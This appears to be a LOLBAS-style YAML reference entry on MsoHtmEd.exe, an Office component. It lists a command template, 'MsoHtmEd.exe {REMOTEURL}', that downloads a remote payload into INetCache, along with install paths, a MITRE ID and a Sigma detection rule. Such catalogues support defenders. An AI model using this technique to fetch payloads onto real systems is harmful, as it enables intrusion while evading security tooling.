---
Name: MsoHtmEd.exe
Description: Microsoft Office component
Author: Nir Chako
Created: 2022-07-24
Commands:
  - Command: MsoHtmEd.exe {REMOTEURL}
    Description: Downloads payload from remote server
    Usecase: It will download a remote payload and place it in INetCache.
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Download: INetCache
Full_Path:
  - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe
  - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.exe
  - Path: C:\Program Files\Microsoft Office\Office16\MSOHTMED.exe
  - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSOHTMED.exe
  - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSOHTMED.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office15\MSOHTMED.exe
  - Path: C:\Program Files\Microsoft Office\Office15\MSOHTMED.exe
  - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSOHTMED.exe
  - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSOHTMED.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.exe
  - Path: C:\Program Files\Microsoft Office\Office14\MSOHTMED.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office12\MSOHTMED.exe
  - Path: C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
  - Path: C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml
  - IOC: Suspicious Office application internet/network traffic
Acknowledgement:
  - Person: Nir Chako (Pentera)
    Handle: '@C_h4ck_0'
